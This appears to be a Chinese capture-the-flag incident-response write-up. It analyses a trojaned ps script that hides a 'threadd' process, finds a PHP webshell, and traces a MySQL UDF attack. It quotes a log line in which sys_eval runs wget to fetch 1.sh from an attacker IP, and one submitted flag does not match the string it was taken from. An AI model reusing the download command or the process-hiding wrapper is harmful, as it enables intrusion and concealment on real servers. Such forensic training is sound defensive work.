通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;
root@ip-10-0-10-1:~# cat /usr/bin/ps #/bin/bash oldifs="$IFS" IFS='\$n' result=$(ps_ $1 $2 $3|grep -v 'threadd' ) for v in $result; do echo -e "$v\t"; done IFS="$oldifs" #//c195i2923381905517d818e313792d19
flag{c195i2923381905517d818e313792d196}
mysql应急响应
1.黑客第一次写入的shell flag{关键字符串}
依旧先下载web目录,使用D盾,找到webshell是sh.php
flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}
2.黑客反弹shell的ip flag{ip}
找到一个远程下载sh脚本
HTTP/1.1" 200 3875 "http://192.168.200.31:8005/adminer.php?username=root&sql=select%20sys_eval(%27wget%20-o%20%2Ftmp%2F1.sh%20192.168.100.13%3A771%2F1.sh%27)%3B" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0"
root@xuanji:~# ls -liah /usr/lib/mysql/plugin/ total 4.7M 33811536 drwxr-xr-x. 1 mysql mysql 39 Aug 1 2023 . 25401542 drwxr-xr-x. 1 root root 20 Jul 31 2023 .. 43783787 -rw-r--r--. 1 mysql mysql 11K May 16 2019 auth_pam.so 43783788 -rw-r--r--. 1 mysql mysql 6.4K May 16 2019 auth_socket.so 43783789 -rw-r--r--. 1 mysql mysql 10K May 16 2019 dialog.so 43783790 -rw-r--r--. 1 mysql mysql 1.6M May 16 2019 ha_innodb.so 43783791 -rw-r--r--. 1 mysql mysql 156K May 16 2019 handlersocket.so 43783792 -rw-r--r--. 1 mysql mysql 6.0K May 16 2019 mysql_clear_password.so 33811537 -rw-rw-rw-. 1 mysql mysql 11K Aug 1 2023 mysqludf.so 43783793 -rw-r--r--. 1 mysql mysql 40K May 16 2019 semisync_master.so 43783794 -rw-r--r--. 1 mysql mysql 15K May 16 2019 semisync_slave.so 43783795 -rw-r--r--. 1 mysql mysql 55K May 16 2019 server_audit.so 43783796 -rw-r--r--. 1 mysql mysql 2.8M May 16 2019 sphinx.so 43783797 -rw-r--r--. 1 mysql mysql 11K May 16 2019 sql_errlog.so 33811538 -rw-rw-rw-. 1 mysql mysql 34 Aug 1 2023 udf.so